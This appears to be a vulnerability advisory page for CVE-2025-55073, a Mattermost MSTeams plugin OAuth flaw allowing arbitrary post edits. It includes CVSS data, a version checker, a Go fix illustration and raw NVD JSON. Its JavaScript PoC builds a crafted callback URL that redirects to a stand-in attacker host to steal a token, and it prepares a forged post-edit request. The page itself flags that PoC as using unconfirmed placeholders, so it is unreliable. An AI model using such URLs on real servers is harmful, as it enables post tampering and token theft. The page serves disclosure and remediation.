Security Vulnerability Report
CVE-2025-55073 CVSS 5.4 MEDIUM

CVE-2025-55073

Published: 2025-11-14 08:15:46
Last Modified: 2025-11-19 21:44:28

Description

Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to validate the relationship between the post being updated and the MSTeams plugin OAuth flow which allows an attacker to edit arbitrary posts via a crafted MSTeams plugin OAuth redirect URL.

CVSS Details

CVSS Score
5.4 (the secondary metric in the raw record); the NVD primary metric scores 5.3
Severity
MEDIUM (both metrics)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L (secondary: exploitability 2.8, impact 2.5)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N (NVD primary: exploitability 3.9, impact 1.4)
The two vectors differ only in privileges required (PR:L vs PR:N) and availability impact (A:L vs A:N); neither records user interaction or a confidentiality impact.
Weakness
CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE for 10.5.0 <= version < 10.5.12 (Mattermost 10.5.x <= 10.5.11; fixed in 10.5.12)
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE for 10.11.0 <= version < 10.11.4 (Mattermost 10.11.x <= 10.11.3; fixed in 10.11.4)
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE for 10.12.0 <= version < 10.12.1 (Mattermost 10.12.x <= 10.12.0; fixed in 10.12.1)
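A small version-range checker for the three affected ranges above, added here as an example and not part of the advisory or of Mattermost. The ranges are transcribed from the configurations block (versionStartIncluding / versionEndExcluding); the input formats it accepts ("10.11.3", "v10.11.3", "10.11.4-rc1") are assumptions, and pre-release tags are ordered below the final release as semver does.

```go
package main

// Added helper (not from the advisory or Mattermost): decides whether a reported
// Mattermost server version falls inside one of the vulnerable ranges that the
// CVE-2025-55073 configurations express as versionStartIncluding/versionEndExcluding.

import (
	"fmt"
	"strconv"
	"strings"
)

type semver struct {
	major, minor, patch int
	pre                 bool // carries a pre-release suffix such as "-rc1"
}

// versionRange is [StartIncluding, EndExcluding), as an NVD cpeMatch states it.
type versionRange struct{ StartIncluding, EndExcluding string }

// affectedRanges are transcribed from the advisory's configurations block.
var affectedRanges = []versionRange{
	{"10.5.0", "10.5.12"},
	{"10.11.0", "10.11.4"},
	{"10.12.0", "10.12.1"},
}

// parseVersion accepts "10.11.3", "v10.11.3", "10.11" and "10.11.4-rc1" (assumed formats).
func parseVersion(raw string) (semver, error) {
	var v semver
	s := strings.TrimPrefix(strings.TrimSpace(raw), "v")
	if i := strings.IndexAny(s, "-+"); i >= 0 {
		v.pre = s[i] == '-' // "+build" metadata does not affect ordering
		s = s[:i]
	}
	parts := strings.Split(s, ".")
	if len(parts) < 2 || len(parts) > 3 {
		return v, fmt.Errorf("unrecognised version %q", raw)
	}
	nums := [3]int{}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return v, fmt.Errorf("unrecognised version %q", raw)
		}
		nums[i] = n
	}
	v.major, v.minor, v.patch = nums[0], nums[1], nums[2]
	return v, nil
}

// cmp orders numerically; with equal numbers a pre-release sorts before the release.
func (a semver) cmp(b semver) int {
	for _, d := range [][2]int{{a.major, b.major}, {a.minor, b.minor}, {a.patch, b.patch}} {
		if d[0] != d[1] {
			if d[0] < d[1] {
				return -1
			}
			return 1
		}
	}
	switch {
	case a.pre && !b.pre:
		return -1
	case !a.pre && b.pre:
		return 1
	}
	return 0
}

// IsAffected reports whether version lies in any affected range. A pre-release
// of a fix version (10.11.4-rc1) sorts below 10.11.4 and is therefore still flagged.
func IsAffected(version string) (bool, error) {
	v, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	for _, r := range affectedRanges {
		lo, _ := parseVersion(r.StartIncluding)
		hi, _ := parseVersion(r.EndExcluding)
		if v.cmp(lo) >= 0 && v.cmp(hi) < 0 {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	for _, v := range []string{"10.5.11", "10.5.12", "10.11.3", "10.11.4-rc1", "10.12.1", "10.10.2", "banana"} {
		affected, err := IsAffected(v)
		fmt.Printf("%-12s affected=%v err=%v\n", v, affected, err)
	}
}
```

Versions outside the three listed ranges (for example 10.10.x or 11.x) are reported as not affected only because the record lists no range for them; treat that as "not listed", not as a statement that those versions were assessed.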

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-55073 PoC - Mattermost MSTeams Plugin OAuth Redirect Post Edit
// This PoC demonstrates the OAuth redirect vulnerability for arbitrary post editing.
// Note: the plugin route and the query parameter names below are the PoC author's
// placeholders; the page cites only the vendor advisory and does not confirm them
// against the plugin's actual endpoints.

// Configuration
const TARGET_HOST = 'mattermost.example.com';
const ATTACKER_SERVER = 'attacker-controlled-server.com';
const TARGET_POST_ID = 'target-post-id-to-edit';
const TARGET_CHANNEL_ID = 'target-channel-id';

// Malicious OAuth redirect URL construction
function constructMaliciousRedirectUrl() {
  const baseUrl = `https://${TARGET_HOST}/plugins/com.mattermost.msteams-webhook/oauth/callback`;
  const params = new URLSearchParams({
    // OAuth state parameter (could be stolen or manipulated)
    state: 'malicious_state_token',
    // Target post information embedded in the redirect
    post_id: TARGET_POST_ID,
    channel_id: TARGET_CHANNEL_ID,
    // Malicious callback to exfiltrate data
    redirect_uri: `https://${ATTACKER_SERVER}/steal-token`,
    // Message content to inject
    message: 'Malicious content injected via OAuth redirect'
  });
  return `${baseUrl}?${params.toString()}`;
}

// Trigger the attack by sending the malicious URL to the victim
async function sendMaliciousLink(victimEmail) {
  const maliciousUrl = constructMaliciousRedirectUrl();
  // In a real attack, this would be sent via email, message, etc. (victimEmail is unused here)
  console.log('[+] Malicious OAuth URL generated:');
  console.log(maliciousUrl);
  console.log('[+] Send this link to victim with edit permissions');

  // Simulated follow-up post edit: the request is assembled but never sent
  const options = {
    hostname: TARGET_HOST,
    path: `/api/v4/posts/${TARGET_POST_ID}`,
    method: 'PUT',
    headers: {
      'Content-Type': 'application/json',
      'Cookie': 'MMAUTHTOKEN=exploited_session_token'
    }
  };
  const postData = JSON.stringify({
    id: TARGET_POST_ID,
    message: 'COMPROMISED: Arbitrary post edited via OAuth redirect'
  });
  console.log('[+] Post edit request prepared (not sent):', options.method, options.path, postData);
  return maliciousUrl;
}

// Execute PoC
sendMaliciousLink('[email protected]');

// Mitigation: Validate OAuth state and enforce post ownership checks
// Recommended fix: Implement CSRF tokens and validate post ownership in OAuth callbacks
```

Two things to notice before relying on this PoC. It only prints a URL and assembles a PUT /api/v4/posts/{id} request that it never sends, so it demonstrates nothing against a live target. Its premise of mailing a link to a victim also does not match the vectors above, which record no user interaction (UI:N) and an attacker with low privileges (PR:L) or none (PR:N); the description's own model is that an authenticated user supplies a crafted MSTeams plugin OAuth redirect URL and the server edits the post it names without checking that the post belongs to that OAuth flow.
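The mitigation the PoC's closing comment names, worked through as an added example in Go (the language Mattermost and its plugins are written in); this is illustrative code, not Mattermost or MSTeams plugin source. It models the flaw the description states: a callback that edits whatever post the redirect URL names, next to a hardened callback that edits only the post bound server-side to the flow's initiator and consumes the state so the URL cannot be replayed. The state store, the post_id/message query parameters and the session-user argument are assumptions made for the example.

```go
package main

// Added illustration of the bug class behind CVE-2025-55073 (not Mattermost or
// MSTeams plugin code): an OAuth callback that edits whatever post the redirect
// URL names, beside one that edits only the post bound server-side to the flow.
// The parameter names and the in-memory store are assumptions for the example.

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
)

var (
	ErrBadState  = errors.New("unknown or already-used oauth state")
	ErrForbidden = errors.New("post is not bound to this oauth flow or user")
)

type Post struct{ ID, UserID, Message string }

// flowState is recorded when a state value is issued: who started the flow
// and the single post that flow may update.
type flowState struct{ UserID, PostID string }

type Server struct {
	Posts  map[string]*Post
	states map[string]flowState
}

func NewServer(posts ...*Post) *Server {
	s := &Server{Posts: map[string]*Post{}, states: map[string]flowState{}}
	for _, p := range posts {
		s.Posts[p.ID] = p
	}
	return s
}

// BeginOAuth: an authenticated user starts the flow for one of their own posts
// and receives the opaque state the client will carry to the callback.
func (s *Server) BeginOAuth(userID, postID string) (string, error) {
	if p, ok := s.Posts[postID]; !ok || p.UserID != userID {
		return "", ErrForbidden
	}
	buf := make([]byte, 16)
	if _, err := rand.Read(buf); err != nil {
		return "", err
	}
	state := hex.EncodeToString(buf)
	s.states[state] = flowState{userID, postID}
	return state, nil
}

// VulnerableCallback checks only that the state exists, then edits whatever
// post_id the redirect URL carries: nothing ties that post to the flow or the
// caller, so any user holding a state of their own can edit any post.
func (s *Server) VulnerableCallback(sessionUserID string, q url.Values) error {
	if _, ok := s.states[q.Get("state")]; !ok {
		return ErrBadState
	}
	p, ok := s.Posts[q.Get("post_id")]
	if !ok {
		return ErrForbidden
	}
	p.Message = q.Get("message")
	return nil
}

// HardenedCallback takes the post from the stored state, requires the session
// user to be the flow's initiator, rejects a URL post_id that disagrees with
// the stored one, and consumes the state so the URL cannot be replayed.
func (s *Server) HardenedCallback(sessionUserID string, q url.Values) error {
	state := q.Get("state")
	fs, ok := s.states[state]
	if !ok {
		return ErrBadState
	}
	delete(s.states, state)
	if pid := q.Get("post_id"); fs.UserID != sessionUserID || (pid != "" && pid != fs.PostID) {
		return ErrForbidden
	}
	p, ok := s.Posts[fs.PostID]
	if !ok || p.UserID != fs.UserID {
		return ErrForbidden
	}
	p.Message = q.Get("message")
	return nil
}

func main() {
	// Constructed scenario: mallory holds a valid state for her own post and crafts a callback URL naming alice's post.
	s := NewServer(&Post{"p-alice", "alice", "original"}, &Post{"p-mallory", "mallory", "mine"})
	st, _ := s.BeginOAuth("mallory", "p-mallory")
	q := url.Values{"state": {st}, "post_id": {"p-alice"}, "message": {"edited by mallory"}}
	fmt.Println("vulnerable:", s.VulnerableCallback("mallory", q), "->", s.Posts["p-alice"].Message)
	s.Posts["p-alice"].Message = "original"
	fmt.Println("hardened:", s.HardenedCallback("mallory", q), "->", s.Posts["p-alice"].Message)
}
```

The design point is that the resource an OAuth completion may touch is decided when the state is issued, on the server, and the callback never takes it from the URL; the session check additionally stops a stolen state from being completed by someone other than its initiator, and single-use state removes replay.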

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-55073", "sourceIdentifier": "[email protected]", "published": "2025-11-14T08:15:45.687", "lastModified": "2025-11-19T21:44:28.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to validate the relationship between the post being updated and the MSTeams plugin OAuth flow which allows an attacker to edit arbitrary posts via a crafted MSTeams plugin OAuth redirect URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.12", "matchCriteriaId": "CCE1652A-13F7-4934-9F90-28129BAEE240"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.4", "matchCriteriaId": "2A1F41DC-D93D-48A7-8A3B-623C3344E979"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.1", "matchCriteriaId": "E21DF5C5-280A-48C5-96C7-C78F0ECF32A3"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```